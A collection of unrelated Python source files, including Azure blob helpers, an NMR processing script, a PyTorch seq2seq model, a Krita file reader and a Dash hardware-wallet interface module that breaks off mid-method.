user_delegation_key=key,
permission=permission,
expiry=end,
start=start,
)
suffix = AzureCloudConfig().suffixes.storage_endpoint
return f"https://{abs_name}.blob.{suffix}/{container_name}/{blob_name}?{sast}"
def _parse_returned_items(items, remove_list: list = None) -> pd.DataFrame:
"""Parse a list of containers into a DataFrame."""
out_items = []
for item in items:
item = dict(item)
if remove_list:
for remove_item in remove_list:
item.pop(remove_item)
out_items.append(item)
return pd.json_normalize(out_items)
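# Minimal usage sketch (assumed account/container/blob names, not part of this module):
#   abs_store = AzureBlobStorage("mystorageaccount", connect=True)
#   abs_store.create_container("mycontainer")
#   abs_store.upload_to_blob(b"some bytes", "mycontainer", "example.bin")
#   data = abs_store.get_blob("mycontainer", "example.bin")
#   sas_uri = abs_store.get_sas_token("mycontainer", "example.bin")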
|
#! /usr/bin/env python
# XXX origin and center are incorrect
import nmrglue as ng
# read in the file
dic,data = ng.pipe.read("../common_data/2d_pipe_tppi/test.fid")
# process the direct dimension
dic,data = ng.pipe_proc.sp(dic,data,off=0.35,end=0.98,pow=2,c=1.0)
dic,data = ng.pipe_proc.zf(dic,data,auto=True)
dic,data = ng.pipe_proc.ft(dic,data,auto=True)
dic,data = ng.pipe_proc.ps(dic,data,p0=151.0,p1=0.0)
dic,data = ng.pipe_proc.di(dic,data)
# process the indirect dimension
dic,data = ng.pipe_proc.tp(dic,data)
dic,data = ng.pipe_proc.sp(dic,data,off=0.35,end=0.98,pow=2,c=0.5)
dic,data = ng.pipe_proc.zf(dic,data,auto=True)
dic,data = ng.pipe_proc.ft(dic,data,auto=True)
dic,data = ng.pipe_proc.ps(dic,data,p0=0.0,p1=0.0)
dic,data = ng.pipe_proc.di(dic,data)
dic,data = ng.pipe_proc.rev(dic,data,sw=True)
dic,data = ng.pipe_proc.tp(dic,data)
# write out processed data
ng.pipe.write("2d_pipe_tppi.ft2",dic,data,overwrite=True)
# check against a file processed with NMRPipe
dic1,data1 = ng.pipe.read("../common_data/2d_pipe_tppi/test.ft2")
dic2,data2 = ng.pipe.read("2d_pipe_tppi.ft2")
print(ng.misc.pair_similar(dic1,data1,dic2,data2,verb=True))
|
from django.db import models
from appregister.base import Registry
class Question(models.Model):
pass
class BooleanQuestion(Question):
pass
class MultipleChoiceQuestion(Question):
pass
# Setting up the registry.
class QuestionRegistry(Registry):
base = Question
discovermodule = 'questions'
registry = QuestionRegistry()
registry.register(BooleanQuestion)
registry.register(MultipleChoiceQuestion)
|
# -*- coding: Utf-8 -*
import os
import sys
from typing import Callable
def __set_constant_path(path_exists: Callable[[str], bool], path: str, *paths: str, special_msg=None, raise_error=True) -> str:
all_path = os.path.join(path, *paths)
if not os.path.isabs(all_path):
all_path = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), all_path)
if not path_exists(all_path) and raise_error:
if special_msg:
raise FileNotFoundError(f"{special_msg}: {all_path}")
raise FileNotFoundError(f"{all_path} folder not found")
return all_path
def set_constant_directory(path, *paths, special_msg=None, raise_error=True) -> str:
return __set_constant_path(os.path.isdir, path, *paths, special_msg=special_msg, raise_error=raise_error)
def set_constant_file(path, *paths, special_msg=None, raise_error=True) -> str:
return __set_constant_path(os.path.isfile, path, *paths, special_msg=special_msg, raise_error=raise_error)
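# Minimal usage sketch (hypothetical paths):
#   IMG_FOLDER = set_constant_directory("resources", "img", special_msg="Image folder not found")
#   ICON_FILE = set_constant_file("resources", "img", "icon.png", raise_error=False)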
|
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class PropertyScrapperItem(scrapy.Item):
address = scrapy.Field()
suburb = scrapy.Field()
description = scrapy.Field()
sold_date = scrapy.Field()
sold_price = scrapy.Field()
bed = scrapy.Field()
bath = scrapy.Field()
parking = scrapy.Field()
property_type = scrapy.Field()
floorplan_url = scrapy.Field()
photo_url = scrapy.Field()
sales_type = scrapy.Field()
|
# already applying .strip() to remove spaces from the start and end of the string, and upper() for uppercase
frase = str(input('Digite a frase: ')).strip().upper()
# split the phrase into a list of words
palavras = frase.split()
# below, the join function glues together the words of the list
juntar_palavras = ''.join(palavras)
size = len(juntar_palavras)
inverso = ''
# size-1 / start from the end of the word, -1 / how far the program has to go, -1 / step backwards one at a time
for c in range(size-1, -1, -1):
inverso += juntar_palavras[c]
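# (Equivalent one-liner for the loop above: inverso = juntar_palavras[::-1])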
if inverso == juntar_palavras:
print('Há um Palíndromo na frase: {}\nSendo ela: {} de trás para frente'.format(frase, inverso))
else:
print('Não há um Palíndromo na frase: {} / {}'.format(frase, inverso))
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from parlai.core.torch_agent import TorchAgent, Output
from torch import optim
import global_variables as gl
class BagOfNGrams(nn.Module):
def init_layers(self):
for l in self.layers:
if getattr(l, 'weight', None) is not None:
torch.nn.init.xavier_uniform_(l.weight)
def __init__(self, vocab_size, emb_dim=300, hidden_size=256, out_size=128, reduce='sum', nlayers=2, activation='ReLU', dropout=0.1, batch_norm=False):
super(BagOfNGrams, self).__init__()
self.emb_dim = emb_dim
self.reduce = reduce
self.nlayers = nlayers
self.hidden_size = hidden_size
self.out_size = out_size
self.activation = getattr(nn, activation)
self.embedding = nn.EmbeddingBag(num_embeddings=vocab_size, embedding_dim=emb_dim, mode=reduce)
if batch_norm is True:
self.batch_norm = nn.BatchNorm1d(self.emb_dim)
self.layers = nn.ModuleList([nn.Linear(self.emb_dim, self.hidden_size)])
self.layers.append(self.activation())
self.layers.append(nn.Dropout(p=dropout))
for i in range(self.nlayers-2):
self.layers.append(nn.Linear(self.hidden_size, self.hidden_size))
self.layers.append(self.activation())
self.layers.append(nn.Dropout(p=dropout))
self.layers.append(nn.Linear(self.hidden_size, self.out_size))
self.init_layers()
def forward(self, x):
postemb = self.embedding(x)
if hasattr(self, 'batch_norm'):
x = self.batch_norm(postemb)
else:
x = postemb
for l in self.layers:
x = l(x)
return x
class DecoderMLP(nn.Module):
"""Generates a token in response to context."""
def __init__(self, input_size=128, output_size=1024, hidden_size=256):
"""Initialize decoder.
:param input_size: size of embedding
:param output_size: size of vocabulary
:param hidden_size: size of the linear layers
"""
super().__init__()
self.linear = nn.Linear(input_size, hidden_size)
self.out = nn.Linear(hidden_size, output_size)
self.log_softmax = nn.LogSoftmax(dim=1)
def forward(self, input):
"""Return encoded state.
:param input: batch_size x 1 tensor of token indices.
:param hidden: past (e.g. encoder) hidden state
"""
output = F.relu(self.linear(input))
scores = self.log_softmax(self.out(output))
return scores
class seq2seq(nn.Module):
def __init__(self, encoder, decoder, id2token, lr = 1e-3, use_cuda = True,
longest_label = 20, clip = 0.3, size_ngrams = 10):
super(seq2seq, self).__init__()
device = torch.device("cuda" if (torch.cuda.is_available() and use_cuda) else "cpu")
self.device = device;
self.encoder = encoder.to(device)
self.decoder = decoder.to(device)
self.size_ngrams = size_ngrams
self.id2token = id2token
self.longest_label = longest_label
# set up the criterion
self.criterion = nn.NLLLoss()
self.optims = {
'nmt': optim.SGD(self.parameters(), lr=lr, nesterov=True, momentum = 0.99)
}
self.clip = clip
self.START = torch.LongTensor([gl.SOS_IDX]).to(device)
self.END_IDX = gl.EOS_IDX
def save_model(self, filename):
state_dict = self.state_dict()
torch.save(state_dict, filename)
def load_model(self, filename):
state_dict = torch.load(filename)
self.load_state_dict(state_dict)
def zero_grad(self):
"""Zero out optimizer."""
for optimizer in self.optims.values():
optimizer.zero_grad()
def update_params(self):
"""Do one optimization step."""
if self.clip is not None:
torch.nn.utils.clip_grad_norm_(self.encoder.parameters(), self.clip)
torch.nn.utils.clip_grad_norm_(self.decoder.parameters(), self.clip)
for optimizer in self.optims.values():
optimizer.step()
def v2t(self, vector):
return [self.id2token[i] for i in vector]
def train_step(self, xs, ys):
"""Train model to produce ys given xs.
:param batch: parlai.core.torch_agent.Batch, contains tensorized
version of observations.
Return estimated responses, with teacher forcing on the input sequence
(list of strings of length batchsize).
"""
if xs is None:
return
xs = xs.to(self.device)
ys = ys.to(self.device)
self.zero_grad()
self.encoder.train()
self.decoder.train()
bow_output = self.encoder(xs)
decoder_output = self.decoder(bow_output)
loss = self.criterion(decoder_output, ys.view(-1))
loss.backward()
self.update_params()
_max_score, predictions = decoder_output.max(1)
return self.v2t(predictions), loss.item()
def eval_step(self, xs, ys):
"""Train model to produce ys given xs.
:param batch: parlai.core.torch_agent.Batch, contains tensorized
version of observations.
Return estimated responses, with teacher forcing on the input sequence
(list of strings of length batchsize).
"""
if xs is None:
return
xs = xs.to(self.device)
ys = ys.to(self.device)
self.encoder.eval()
self.decoder.eval()
bow_output = self.encoder(xs)
decoder_output = self.decoder(bow_output)
loss = self.criterion(decoder_output, ys.view(-1))
_max_score, predictions = decoder_output.max(1)
return self.v2t(predictions), loss.item()
def evaluate(self, xs, use_context=False, score_only=False):
"""Generate a response to the input tokens.
:param batch: parlai.core.torch_agent.Batch, contains tensorized
version of observations.
Return predicted responses (list of strings of length batchsize).
"""
if xs is None:
return
xs = xs.to(self.device)
bsz = xs.size(0)
ys = torch.cat((xs[0, 1:].unsqueeze(0), torch.LongTensor([[gl.EOS_IDX]])), dim=1)
# just predict
self.encoder.eval()
self.decoder.eval()
if score_only or not use_context:
encoder_input = torch.LongTensor([gl.SOS_IDX] * self.size_ngrams)
encoder_input = encoder_input.unsqueeze(0).repeat(bsz, 1)
else:
if xs.size(1) >= self.size_ngrams:
encoder_input = xs[-self.size_ngrams:]
else:
encoder_input = torch.LongTensor([[gl.SOS_IDX] * (self.size_ngrams - xs.size(1))])
encoder_input = torch.cat((encoder_input, xs), dim=1) # this needs to be of shape bsz, self.size_ngrams
predictions = []
done = [False for _ in range(bsz)]
total_done = 0
scores = torch.zeros(bsz)
score_counts = 0
if score_only:
num_predictions = xs.size(1)
else:
num_predictions = self.longest_label
for i in range(num_predictions):
decoder_input = self.encoder(encoder_input)
decoder_output = self.decoder(decoder_input)
loss = self.criterion(decoder_output, torch.LongTensor([ys[0][i]]))
_max_score, next_token = decoder_output.max(1)
scores = scores + loss.item()
score_counts += 1
if score_only: # replace the next token with the one in the input data
next_token = torch.index_select(xs, 1, torch.tensor([i])).squeeze(1)
predictions.append(next_token)
indices = torch.tensor([i for i in range(1, self.size_ngrams)])
prev_tokens = torch.index_select(encoder_input, 1, indices)
encoder_input = torch.cat((prev_tokens, next_token.unsqueeze(1)), 1)
            # stop if you've found the END token
for b in range(bsz):
if not done[b]:
# only add more tokens for examples that aren't done
if next_token[b].item() == self.END_IDX:
# if we produced END, we're done
done[b] = True
total_done += 1
if total_done == bsz:
# no need to generate any more
break
predictions = [self.v2t(p) for p in predictions]
scores = scores / score_counts
return predictions, scores
|
import zipfile
import os
#import PIL
from lxml import etree as ET
__author__ = 'pierre'
ns = {'kra': 'http://www.calligra.org/DTD/krita'}
class Kra(object):
maindoc_xml = None
merged_image = None
basename = None
icc = None
icc_path = None
kra_name = None
def __init__(self, krafile):
kra = zipfile.ZipFile(krafile)
self.__merged_image_path = None
self.filename = os.path.basename(krafile)
self.basename, _ = self.filename.split('.')
self.merged_image = kra.read('mergedimage.png')
self.xml = ET.fromstring(kra.read('maindoc.xml'))
self.kra_name = self.xml.find('.//kra:IMAGE', ns).attrib['name']
self.icc = kra.read('{basename}/annotations/icc'.format(basename=self.kra_name))
@property
def merged_image_path(self):
return self.__merged_image_path
@merged_image_path.setter
def merged_image_path(self, path):
self.__merged_image_path = path
def get_basename(self):
return self.basename
def get_merged_image(self):
return self.merged_image
def get_icc(self):
x = self.xml.find('.//kra:IMAGE', ns)
icc_name = x.attrib['profile']
return {'name': icc_name, 'data': self.icc} |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Bertrand256
# Created on: 2017-03
from __future__ import annotations
import functools
import hashlib
import re
import urllib, urllib.request, urllib.parse
from functools import partial
from io import BytesIO
from typing import Optional, Tuple, List, ByteString, Dict, cast, Any, Literal
import sys
import simplejson
import trezorlib
import trezorlib.btc
import trezorlib.exceptions
import trezorlib.misc
import keepkeylib.client
import usb1
from PyQt5.QtCore import pyqtSlot, QObject
from PyQt5 import QtWidgets, QtCore
from PyQt5.QtWidgets import QDialog, QWidget
from trezorlib.tools import Address
import app_defs
import dash_utils
from app_runtime_data import AppRuntimeData
from dash_utils import bip32_path_n_to_string
from hw_common import HWType, HWDevice, HWPinException, get_hw_type_from_client, HWNotConnectedException, \
DEFAULT_HW_BUSY_TITLE, DEFAULT_HW_BUSY_MESSAGE, HWSessionBase, HWFirmwareWebLocation, HWModel
import logging
from method_call_tracker import MethodCallTracker
from thread_fun_dlg import CtrlObject
from wallet_common import UtxoType, TxOutputType
from wnd_utils import WndUtils
import hw_intf_ledgernano as ledger
import hw_intf_keepkey as keepkey
import hw_intf_trezor as trezor
from app_defs import get_note_url
from app_utils import SHA256, url_path_join
from common import CancelException, InternalError
from thread_utils import EnhRLock
# Dict[str <hd tree ident>, Dict[str <bip32 path>, Tuple[str <address>, int <db id>]]]
bip32_address_map: Dict[str, Dict[str, Tuple[str, int]]] = {}
hd_tree_db_map: Dict[str, int] = {} # Dict[str <hd tree ident>, int <db id>]
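# Example entry of bip32_address_map (illustrative placeholders only):
#   bip32_address_map['<hd-tree-ident>'] = {"44'/5'/0'/0/0": ('<dash address>', 1)}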
log = logging.getLogger('dmt.hw_intf')
def control_hw_call(func):
"""
Decorator for some of the hardware wallet functions. It ensures that the hw client connection is open (and if it
is not, it attempts to open it). The second thing it does is catch the OSError exception raised when the hw cable
is disconnected. After that, the connection has to be closed and opened again, otherwise a 'read error' occurs.
:param func: the decorated function. Its first argument has to be a reference to the HwSessionInfo object.
"""
def catch_hw_client(*args, **kwargs):
hw_session: HwSessionInfo = args[0]
client = hw_session.hw_client
if not client:
client = hw_session.hw_connect()
if not client:
raise HWNotConnectedException()
try:
try:
# protect against simultaneous access to the same device from different threads
hw_session.acquire_client()
if hw_session.hw_type == HWType.trezor:
try:
ret = func(*args, **kwargs)
except trezorlib.exceptions.PinException as e:
raise HWPinException(e.args[1])
elif hw_session.hw_type == HWType.keepkey:
try:
ret = func(*args, **kwargs)
except keepkeylib.client.PinException as e:
raise HWPinException(e.args[1])
elif hw_session.hw_type == HWType.ledger_nano:
ret = func(*args, **kwargs)
else:
raise Exception('Unknown hardware wallet type: ' + str(hw_session.hw_type))
finally:
hw_session.release_client()
except (OSError, usb1.USBErrorNoDevice) as e:
logging.exception('Exception calling %s function' % func.__name__)
logging.info('Disconnecting HW after OSError occurred')
hw_session.hw_disconnect()
raise HWNotConnectedException('The hardware wallet device has been disconnected with the '
'following error: ' + str(e))
except HWPinException:
raise
except CancelException:
raise
except Exception:
logging.exception('Exception calling %s function' % func.__name__)
raise
return ret
return catch_hw_client
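# Example usage (hypothetical function, shown only to illustrate the decorator contract:
# the first positional argument must be the HwSessionInfo object):
#
#   @control_hw_call
#   def read_something(hw_session: HwSessionInfo, bip32_path: str):
#       return hw_session.hw_client.some_call(bip32_path)   # 'some_call' is a placeholder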
def get_hw_device_state_str(hw_device: HWDevice):
"""Returns a string that comprises of all the information that relates to a hw device state. Used mainly to
estimate whether the UI should refresh the information about a given device."""
dev_state_str = ''
if hw_device:
dev_state_str = hw_device.device_id + '|' + ('B' if hw_device.bootloader_mode else 'NB') + '|' + \
('I' if hw_device.initialized else 'NI') + '|' + ('L' if hw_device.locked else 'U') + '|' + \
str(hw_device.device_label)
return dev_state_str
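# Example of the returned value (illustrative): 'A1B2C3D4|NB|I|U|My Trezor', i.e.
# device id | bootloader-mode flag | initialized flag | locked flag | device label.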
def get_device_list(hw_types: Tuple[HWType, ...], allow_bootloader_mode: bool = False,
use_webusb=True, use_bridge=True, use_udp=True, use_hid=True, passphrase_encoding='NFC') \
-> List[HWDevice]:
dev_list = []
if HWType.trezor in hw_types:
try:
devs = trezor.get_device_list(allow_bootloader_mode=allow_bootloader_mode,
use_webusb=use_webusb, use_bridge=use_bridge, use_udp=use_udp, use_hid=use_hid)
dev_list.extend(devs)
except Exception as e:
log.exception('Exception while connecting Trezor device: ' + str(e))
if HWType.keepkey in hw_types:
try:
devs = keepkey.get_device_list(passphrase_encoding, allow_bootloader_mode=allow_bootloader_mode)
dev_list.extend(devs)
except Exception as e:
log.exception('Exception while connecting Keepkey device: ' + str(e))
if HWType.ledger_nano in hw_types:
try:
devs = ledger.get_device_list(allow_bootloader_mode=allow_bootloader_mode)
dev_list.extend(devs)
except Exception as e:
log.exception('Exception while connecting Ledger Nano device: ' + str(e))
return dev_list
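# Example call (hypothetical): list Trezor and Keepkey devices only, skipping HID transports:
#
#   devices = get_device_list((HWType.trezor, HWType.keepkey), use_hid=False)
#   for d in devices:
#       print(d.device_id, d.device_label)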
def cancel_hw_thread_dialog(hw_client):
try:
hw_type = get_hw_type_from_client(hw_client)
if hw_type == HWType.trezor:
hw_client.cancel()
elif hw_type == HWType.keepkey:
hw_client.cancel()
elif hw_type == HWType.ledger_nano:
return False
raise CancelException('Cancel')
except CancelException:
raise
except Exception as e:
logging.warning('Error when canceling hw session. Details: %s', str(e))
return True
def cancel_hw_operation(hw_client):
try:
hw_type = get_hw_type_from_client(hw_client)
if hw_type in (HWType.trezor, HWType.keepkey):
hw_client.cancel()
except Exception as e:
logging.error('Error when cancelling hw operation: %s', str(e))
def get_hw_label(hw_client):
hw_type = get_hw_type_from_client(hw_client)
if hw_type in (HWType.trezor, HWType.keepkey):
return hw_client.features.label
elif hw_type == HWType.ledger_nano:
return 'Ledger Nano S'
def firmware_update(hw_client, raw_data: bytes):
hw_type = get_hw_type_from_client(hw_client)
if hw_type == HWType.trezor:
trezor.firmware_update(hw_client, raw_data)
elif hw_type == HWType.keepkey:
hw_client.firmware_update(fp=BytesIO(raw_data))
elif hw_type == HWType.ledger_nano:
raise Exception('Ledger Nano S is not supported.')
def action_on_device_message(message=DEFAULT_HW_BUSY_MESSAGE, title=DEFAULT_HW_BUSY_TITLE, is_method_call: bool = False):
def decorator_f(func):
def wrapped_f(*args, **kwargs):
hw_client = None
hw_client_names = ('MyTrezorClient', 'KeepkeyClient')
# look for hw client:
for arg in args:
name = type(arg).__name__
if name in hw_client_names:
hw_client = arg
break
elif name == 'HWDevice':
hw_client = arg.hw_client
break
if not hw_client:
for arg_name in kwargs:
name = type(kwargs[arg_name]).__name__
if name in hw_client_names:
hw_client = kwargs[arg_name]
break
elif name == 'HWDevice':
hw_client = kwargs[arg_name].hw_client
break
def thread_dialog(ctrl):
if ctrl:
ctrl.dlg_config(dlg_title=title, show_progress_bar=False)
ctrl.display_msg(message)
if is_method_call and len(args):
return func(*args[1:], **kwargs) # if this is a method call, skip passing the 'self' argument,
# which is the first positional one
else:
return func(*args, **kwargs)
return WndUtils.run_thread_dialog(thread_dialog, (), True, show_window_delay_ms=1000,
force_close_dlg_callback=partial(cancel_hw_thread_dialog, hw_client))
return wrapped_f
return decorator_f
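# Example usage (hypothetical): the decorator scans the arguments for a hw client (or a
# HWDevice carrying one) and shows a "busy" dialog while the wrapped function runs:
#
#   @action_on_device_message(message='Confirm the operation on your device...')
#   def do_something_on_device(hw_device: HWDevice):
#       ...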
@action_on_device_message()
def ping_device(hw_device: HWDevice, message: str):
def ledger_ping(ctrl):
"""The only way to make Ledger Nano to display a message is to use the message signing feature."""
message = "Ping from DMT"
message_hash = hashlib.sha256(message.encode('ascii')).hexdigest().upper()
ctrl.dlg_config(dlg_title=message, show_progress_bar=False)
display_label = '<b>This is a "ping" message from DMT</b> (we had to use the message signing feature).<br>' \
'<b>Message: </b>' + message + '<br>' \
'<b>SHA256 hash:</b> ' + message_hash + '<br>' \
'<br>Click "Sign" on the device to close this dialog.</b>'
ctrl.display_msg(display_label)
try:
ledger.sign_message(hw_device.hw_client, dash_utils.get_default_bip32_path('MAINNET'), message, None)
except CancelException:
pass
if hw_device.hw_type == HWType.trezor:
trezor.ping(hw_device.hw_client, message)
elif hw_device.hw_type == HWType.keepkey:
keepkey.ping(hw_device.hw_client, message)
elif hw_device.hw_type == HWType.ledger_nano:
WndUtils.run_thread_dialog(ledger_ping, (), True, force_close_dlg_callback=partial(cancel_hw_thread_dialog,
hw_device.hw_client))
else:
logging.error('Invalid HW type: ' + str(hw_device.hw_type))
@action_on_device_message()
def change_pin(hw_device: HWDevice, remove=False):
if hw_device and hw_device.hw_client:
if hw_device.hw_type == HWType.trezor:
return trezor.change_pin(hw_device.hw_client, remove)
elif hw_device.hw_type == HWType.keepkey:
return keepkey.change_pin(hw_device.hw_client, remove)
elif hw_device.hw_type == HWType.ledger_nano:
raise Exception('Ledger Nano S is not supported.')
else:
logging.error('Invalid HW type: ' + str(hw_device.hw_type))
@action_on_device_message()
def set_passphrase_option(hw_device: HWDevice, enabled: bool):
if hw_device.hw_type == HWType.trezor:
trezor.enable_passphrase(hw_device.hw_client, enabled)
elif hw_device.hw_type == HWType.keepkey:
keepkey.enable_passphrase(hw_device.hw_client, enabled)
elif hw_device.hw_type == HWType.ledger_nano:
raise Exception('Ledger Nano is not supported.')
else:
logging.error('Invalid HW type: ' + str(hw_device.hw_type))
@action_on_device_message()
def set_label(hw_device: HWDevice, label: str):
if hw_device and hw_device.hw_client:
if hw_device.hw_type == HWType.trezor:
return trezor.set_label(hw_device.hw_client, label)
elif hw_device.hw_type == HWType.keepkey:
return keepkey.set_label(hw_device.hw_client, label)
elif hw_device.hw_type == HWType.ledger_nano:
raise Exception('Ledger Nano S is not supported.')
else:
logging.error('Invalid HW type: ' + str(hw_device.hw_type))
@action_on_device_message()
def set_passphrase_always_on_device(hw_device: HWDevice, enabled: bool):
if hw_device.hw_type == HWType.trezor:
trezor.set_passphrase_always_on_device(hw_device.hw_client, enabled)
elif hw_device.hw_type == HWType.keepkey:
raise Exception('Keepkey is not supported.')
elif hw_device.hw_type == HWType.ledger_nano:
raise Exception('Ledger Nano S is not supported.')
else:
logging.error('Invalid HW type: ' + str(hw_device.hw_type))
@action_on_device_message()
def set_wipe_code(hw_device: HWDevice, remove: bool):
if hw_device.hw_type == HWType.trezor:
trezor.set_wipe_code(hw_device.hw_client, remove)
elif hw_device.hw_type == HWType.keepkey:
raise Exception('Keepkey is not supported.')
elif hw_device.hw_type == HWType.ledger_nano:
raise Exception('Ledger Nano S is not supported.')
else:
logging.error('Invalid HW type: ' + str(hw_device.hw_type))
@action_on_device_message()
def set_sd_protect(hw_device: HWDevice, operation: Literal["enable", "disable", "refresh"]):
if hw_device.hw_type == HWType.trezor:
trezor.sd_protect(hw_device.hw_client, operation)
elif hw_device.hw_type == HWType.keepkey:
raise Exception('Keepkey is not supported.')
elif hw_device.hw_type == HWType.ledger_nano:
raise Exception('Ledger Nano S is not supported.')
else:
logging.error('Invalid HW type: ' + str(hw_device.hw_type))
def hw_connection_tracker(func):
"""
The purpose of this decorator is to track:
a) whether the connection state to the hardware wallet has changed
b) whether the selected hw device has changed
within the HWDevices object, and if so, to emit the appropriate Qt signals. We use MethodCallTracker here
to emit the signals only once, even if the connection/selection status changes several times within the call chain.
Note that the connected hardware wallet device is not the same as the selected one, as the HWDevices class has
the ability to select a device without connecting to it.
"""
@functools.wraps(func)
def wrapper(self: HWDevices, *args, **kwargs):
def get_hw_client_state_str():
hw_device = self.get_selected_device()
if hw_device and hw_device.hw_client:
return get_hw_device_state_str(hw_device)
else:
return ''
call_count = MethodCallTracker.get_call_depth_by_class(self)
hw_client_hash_old = ''
hw_dev_hash_old = ''
if call_count == 0:
hw_client_hash_old = get_hw_client_state_str()
hw_dev_hash_old = get_hw_device_state_str(self.get_selected_device())
ret = None
with MethodCallTracker(self, func):
ret = func(self, *args, **kwargs)
if call_count == 0:
hw_hash_new = get_hw_client_state_str()
hw_dev_hash_new = get_hw_device_state_str(self.get_selected_device())
if hw_client_hash_old != hw_hash_new:
self.sig_connected_hw_device_changed.emit(self.get_selected_device())
if hw_dev_hash_old != hw_dev_hash_new:
self.sig_selected_hw_device_changed.emit(self.get_selected_device())
return ret
return wrapper
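# Illustrative usage: every HWDevices method that can change the connection or selection
# state is wrapped with this decorator (see the methods below), e.g.:
#
#   @hw_connection_tracker
#   def some_state_changing_method(self, *args):
#       ...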
class HWDevices(QObject):
"""
Manages information about all hardware wallet devices connected to the computer.
"""
sig_selected_hw_device_changed = QtCore.pyqtSignal(object)
sig_connected_hw_device_changed = QtCore.pyqtSignal(object)
__instance = None
class HWDevicesState:
def __init__(self, connected_dev_ids: List[str], selected_device_id: Optional[str],
selected_device_model: Optional[str],
selected_device_bootloader_mode: Optional[bool],
allow_bootloader_mode: bool, hw_types_allowed: Tuple[HWType, ...]):
self.connected_device_ids: List[str] = connected_dev_ids
self.device_id_selected: Optional[str] = selected_device_id
self.selected_device_model = selected_device_model
self.selected_device_bootloader_mode = selected_device_bootloader_mode
self.allow_bootloader_mode: bool = allow_bootloader_mode
self.hw_types_allowed: Tuple[HWType, ...] = hw_types_allowed
@staticmethod
def get_instance() -> 'HWDevices':
return HWDevices.__instance
def __init__(self, use_webusb=True, use_bridge=True, use_udp=True, use_hid=True, passphrase_encoding='NFC'):
super(HWDevices, self).__init__()
if HWDevices.__instance is not None:
raise Exception('Internal error: cannot create another instance of this class')
HWDevices.__instance = self
self.__hw_devices: List[HWDevice] = []
self.__hw_device_id_selected: Optional[str] = None # device id of the hw client selected
self.__selected_device_bootloader_mode: Optional[bool] = None
self.__selected_device_model: Optional[str] = None
self.__devices_fetched = False
self.__use_webusb = use_webusb
self.__use_bridge = use_bridge
self.__use_udp = use_udp
self.__use_hid = use_hid
self.__hw_types_allowed: Tuple[HWType, ...] = (HWType.trezor, HWType.keepkey, HWType.ledger_nano)
self.__passphrase_encoding: Optional[str] = passphrase_encoding
self.__saved_states: List[HWDevices.HWDevicesState] = []
self.__allow_bootloader_mode: bool = False
def set_allow_bootloader_mode(self, allow: bool):
self.__allow_bootloader_mode = allow
def save_state(self):
connected_devices = []
for dev in self.__hw_devices:
if dev.hw_client:
connected_devices.append(dev.device_id)
self.__saved_states.append(HWDevices.HWDevicesState(
connected_devices, self.__hw_device_id_selected, self.__selected_device_model,
self.__selected_device_bootloader_mode, self.__allow_bootloader_mode, self.__hw_types_allowed))
@hw_connection_tracker
def restore_state(self):
if self.__saved_states:
state = self.__saved_states.pop()
self.__allow_bootloader_mode = state.allow_bootloader_mode
self.__hw_types_allowed = state.hw_types_allowed
# reconnect all the devices that were connected during the call of 'save_state'
for dev_id in state.connected_device_ids:
dev = self.get_device_by_id(dev_id)
if dev and not dev.hw_client:
try:
self.open_hw_session(dev)
except Exception as e:
log.error(f'Cannot reconnect device {dev.device_id} due to the following error: ' + str(e))
# disconnect all the currently connected devices that weren't connected
# when 'save_state' was called
for dev in self.__hw_devices:
if dev.hw_client and dev.device_id not in state.connected_device_ids:
try:
self.close_hw_session(dev)
except Exception as e:
log.error(f'Cannot disconnect device {dev.device_id} due to the following error: ' + str(e))
# restore the currently selected device
if state.device_id_selected and (self.__hw_device_id_selected != state.device_id_selected or
self.__selected_device_model != state.selected_device_model or
self.__selected_device_bootloader_mode != state.selected_device_bootloader_mode):
dev = self.get_device_by_id(state.device_id_selected)
if dev:
self.set_current_device(dev)
else:
raise InternalError('There are no saved states')
@hw_connection_tracker
def load_hw_devices(self, force_fetch: bool = False) -> bool:
"""
Load all instances of the allowed hardware wallet types. If there is more than one, the user has to select
which one to use.
:return: True if anything has changed about the state of the connected hw devices during the process.
"""
state_changed = False
if force_fetch or not self.__devices_fetched:
# save the current state to see if anything has changed during the process
prev_dev_list = [get_hw_device_state_str(d) for d in self.__hw_devices]
prev_dev_list.sort()
if force_fetch:
self.save_state()
restore_state = True
else:
restore_state = False
self.clear_devices()
self.__hw_devices = get_device_list(
hw_types=self.__hw_types_allowed, use_webusb=self.__use_webusb,
use_bridge=self.__use_bridge, use_udp=self.__use_udp, use_hid=self.__use_hid,
passphrase_encoding=self.__passphrase_encoding,
allow_bootloader_mode=self.__allow_bootloader_mode
)
self.__devices_fetched = True
if self.__hw_device_id_selected:
if self.get_selected_device_index() < 0:  # the previously selected device is no longer present
self.__hw_device_id_selected = None
self.__selected_device_model = None
self.__selected_device_bootloader_mode = None
if restore_state:
try:
self.restore_state()
except Exception as e:
log.error('Error while restoring hw devices state: ' + str(e))
cur_dev_list = [get_hw_device_state_str(d) for d in self.__hw_devices]
cur_dev_list.sort()
state_changed = (','.join(prev_dev_list) != ','.join(cur_dev_list))
return state_changed
@hw_connection_tracker
def close_all_hw_clients(self):
try:
for idx, hw_inst in enumerate(self.__hw_devices):
if hw_inst.hw_client:
self.close_hw_session(hw_inst)
except Exception as e:
logging.exception(str(e))
@hw_connection_tracker
def clear_devices(self):
self.close_all_hw_clients()
self.__hw_devices.clear()
@hw_connection_tracker
def clear(self):
self.clear_devices()
self.__hw_device_id_selected = None
self.__selected_device_model = None
self.__selected_device_bootloader_mode = None
def set_hw_types_allowed(self, allowed: Tuple[HWType, ...]):
self.__hw_types_allowed = allowed[:]
def get_selected_device_index(self) -> int:
return next((i for i, device in enumerate(self.__hw_devices)
if device.device_id == self.__hw_device_id_selected), -1)
def get_devices(self) -> List[HWDevice]:
return self.__hw_devices
def get_selected_device(self) -> Optional[HWDevice]:
idx = self.get_selected_device_index()
if idx >= 0:
return self.__hw_devices[idx]
else:
return None
def get_device_by_id(self, device_id: str) -> Optional[HWDevice]:
for dev in self.__hw_devices:
if dev.device_id == device_id:
return dev
return None
@hw_connection_tracker
def set_current_device(self, device: HWDevice):
if device in self.__hw_devices:
if device.device_id != self.__hw_device_id_selected or device.model_symbol != self.__selected_device_model \
or device.bootloader_mode != self.__selected_device_bootloader_mode:
self.__hw_device_id_selected = device.device_id
self.__selected_device_model = device.model_symbol
self.__selected_device_bootloader_mode = device.bootloader_mode
else:
raise Exception('Non existent hw device object.')
@hw_connection_tracker
def set_current_device_by_index(self, index: int):
